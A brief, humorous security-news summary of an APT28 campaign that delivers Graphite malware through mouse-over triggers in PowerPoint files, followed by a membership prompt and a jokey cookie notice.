Fancy Bear Strikes Again: New Mouse Movement Exploit in PowerPoint Unleashes Graphite Malware

Fancy Bear, aka APT28, is back with a devious twist: deploying Graphite malware via mouse movements in MS PowerPoint files. This Russian state-sponsored group uses a PowerShell script to download and execute a malicious dropper, targeting government and defense sectors. Beware of unexpected presentations—your mouse might be plotting against you!

3P
Published: August 5, 2024 7:41 amAdded: August 5, 2024 at 1:14 amAssembled by: The Editor
Pro Dashboard

Hot Take:

Fancy Bear is back, proving that even the Russian military intelligence unit can’t resist the PowerPoint addiction. Instead of boring slides, they’ve added a touch of malware to keep things spicy. Who knew mouse movements could be so dangerous? Next time you’re in a meeting, keep an eye on that cursor—it might be up to no good!

Key Points:

  • Fancy Bear (APT28) is using mouse movements in PowerPoint to distribute malware.
  • The attack involves a PowerShell script and a dropper file from OneDrive.
  • The malicious payload is a Graphite malware variant utilizing Microsoft Graph API and OneDrive.
  • The campaign uses a lure document linked to the OECD.
  • Targets include government and defense sectors in Eastern Europe and Europe.

Membership Required

 You must be a member to access this content.

View Membership Levels
Already a member? Log in here
The Nimble Nerd
powered by the NSA, er,  GDPR Cookie Compliance
Confessional Booth of Our Digital Sins

Okay, deep breath, let's get this over with. In the grand act of digital self-sabotage, we've littered this site with cookies. Yep, we did that. Why? So your highness can have a 'premium' experience or whatever. These traitorous cookies hide in your browser, eagerly waiting to welcome you back like a guilty dog that's just chewed your favorite shoe. And, if that's not enough, they also tattle on which parts of our sad little corner of the web you obsess over. Feels dirty, doesn't it?